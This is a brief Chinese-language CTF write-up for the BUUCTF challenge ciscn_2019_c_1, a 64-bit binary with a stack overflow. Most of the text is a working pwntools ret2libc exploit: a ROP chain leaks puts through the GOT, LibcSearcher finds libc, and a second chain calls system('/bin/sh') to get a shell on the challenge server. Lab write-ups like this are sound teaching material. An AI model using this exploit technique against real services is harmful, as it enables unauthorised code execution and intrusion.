先查看一下

是一个64位的程序开启了NX
拿IDA分析


发现存在栈溢出漏洞，
程序没有system函数，没有bin_sh
因此考虑libc
exp:

from pwn import*
from LibcSearcher import*

p= remote("node4.buuoj.cn",27495)
#p = process("./ciscn_2019_c_1")
elf = ELF("./ciscn_2019_c_1")

context(os="linux",log_level="debug",arch="amd64")

if __name__ == "__main__":

    p.recvuntil("Input your choice!")
    p.sendline("1")
    p.recvuntil("Input your Plaintext to be encrypted")
    
    puts_plt = elf.plt["puts"]
    puts_got = elf.got["puts"]
    main_addr = 0x400B28
    pop_rdi = 0x400c83
    p.sendline(b"A"*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr))

    p.recvuntil("Ciphertext\n")
    p.recvline()
    puts_addr=u64(p.recv(7)[:-1].ljust(8,b'\x00'))

    libc = LibcSearcher("puts",puts_addr)

    libc_base = puts_addr-libc.dump("puts")
    system_addr = libc_base+libc.dump("system")
    bin_addr = libc_base+libc.dump("str_bin_sh")
    
    p.recvuntil("Input your choice!")
    p.sendline("1")
    p.recvuntil("Input your Plaintext to be encrypted")
    ret=0x4006b9
    p.sendline(b"A"*(0x50+8)+p64(ret)+p64(pop_rdi)+p64(bin_addr)+p64(system_addr))

    p.interactive()